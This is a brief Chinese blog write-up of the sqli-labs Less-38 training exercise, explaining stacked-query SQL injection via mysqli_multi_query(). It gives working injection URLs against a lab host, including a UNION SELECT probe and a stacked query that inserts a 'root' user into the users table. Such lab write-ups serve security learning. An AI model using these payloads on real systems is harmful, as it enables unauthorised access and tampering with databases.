【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)

这个直接用union select就可以

http://192.168.136.128/sqli-labs-master/Less-38/?id=0' union select 1,2,3%23

看一下源码，发现这关的关键并不在此

mysqli_multi_query()是可以执行多条语句的

来看这个语句

两条select都得到了执行

这个就涉及到了堆叠注入，参考 https://www.cnblogs.com/0nth3way/articles/7128189.html

http://192.168.136.128/sqli-labs-master/Less-38/?id=1';insert into users(id,username,password) values (15,'root','root')%23

insert执行成功

posted @ 2018-01-30 14:18 omnis 阅读(390) 评论(0) 编辑收藏举报

刷新页面返回顶部